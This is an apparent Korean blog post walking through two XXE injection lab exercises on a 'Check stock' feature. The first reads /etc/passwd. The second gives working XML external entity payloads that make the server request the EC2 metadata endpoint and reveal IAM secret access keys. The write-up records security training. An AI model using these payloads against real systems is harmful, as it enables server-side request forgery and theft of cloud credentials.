[2025-07-08] XXE

🦥 본문

XXE(1)

이 실습에는 XML 입력을 파싱하고 응답에서 예상치 못한 값을 반환하는 ‘재고 확인(Check stock)’ 기능이 있습니다. 이 실습을 해결하려면, XML 외부 엔티티(XML External Entity, XXE)를 삽입하여 /etc/passwd 파일의 내용을 가져오세요.

사이트를 처음 들어가면 아래와 같은 이미지가 나타난다 view detail을 클릭하면 다음과 같다.

Check stock을 클릭하여 인터셉트 하면 다음과 같은 Request를 보낸다. XML 방식으로 보내는 데 이 Request를 Repeater로 보내서 다음과 같이 보내면 비밀번호를 얻을 수 있다.

XXE(2)

이 실습에는 XML 입력을 파싱하고, 응답에 예상치 못한 값을 포함하여 반환하는 “재고 확인(Check stock)” 기능이 있습니다.

실습 서버는 기본 주소인 http://169.254.169.254/에서 실행되는 (모의된) EC2 메타데이터 엔드포인트를 가지고 있습니다. 이 엔드포인트는 해당 인스턴스에 대한 데이터를 조회하는 데 사용할 수 있으며, 일부 정보는 민감할 수 있습니다.

이 실습을 해결하려면, XXE 취약점을 이용하여 SSRF(Server-Side Request Forgery) 공격을 수행하고, EC2 메타데이터 엔드포인트로부터 서버의 IAM 비밀 접근 키(secret access key)를 획득해야 합니다.

위와 비슷한 사이트로 Check Stock을 클릭하여 Request를 인터셉트하면 위과 같은 Request가 나온다.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<stockCheck>
  <productId>&xxe;</productId>
</stockCheck>

위와 같이 보내면 해당 계정을 알 수 있다. Res를 보면 admin인 것을 알 수 있다.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">
]>
<stockCheck>
  <productId>&xxe;</productId>
</stockCheck>

위와 같이 보내면 key 값들을 모두 볼 수 있게 된다.